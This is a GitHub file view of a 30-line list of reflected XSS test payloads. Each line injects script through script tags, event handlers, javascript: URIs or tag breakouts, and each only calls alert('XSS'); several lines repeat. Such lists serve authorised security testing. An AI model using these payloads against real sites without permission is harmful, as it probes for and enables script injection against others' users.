-
-
Notifications
You must be signed in to change notification settings - Fork 8
Expand file tree
/
Copy pathreflected_xss_payloads.txt
More file actions
30 lines (30 loc) · 1.13 KB
/
reflected_xss_payloads.txt
File metadata and controls
30 lines (30 loc) · 1.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<a href="javascript:alert('XSS')">Click me</a>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>
<marquee onstart=alert('XSS')>XSS</marquee>
<body onload=alert('XSS')>
<input value="<script>alert('XSS')</script>">
<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')">
"><script>alert('XSS')</script>
"><img src=x onerror=alert('XSS')>
"><svg onload=alert('XSS')>
"><iframe src="javascript:alert('XSS')">
"><body onload=alert('XSS')>
"><input value="<script>alert('XSS')</script>">
"><object data="javascript:alert('XSS')">
"><embed src="javascript:alert('XSS')">
"><a href="javascript:alert('XSS')">Click me</a>
</textarea><script>alert('XSS')</script>
</style><script>alert('XSS')</script>
</title><script>alert('XSS')</script>
"><img src=x onerror=alert('XSS')>
"><svg onload=alert('XSS')>
"><iframe src="javascript:alert('XSS')">
"><body onload=alert('XSS')>
"><input value="<script>alert('XSS')</script>">
"><object data="javascript:alert('XSS')">
"><embed src="javascript:alert('XSS')">
"><a href="javascript:alert('XSS')">Click me</a>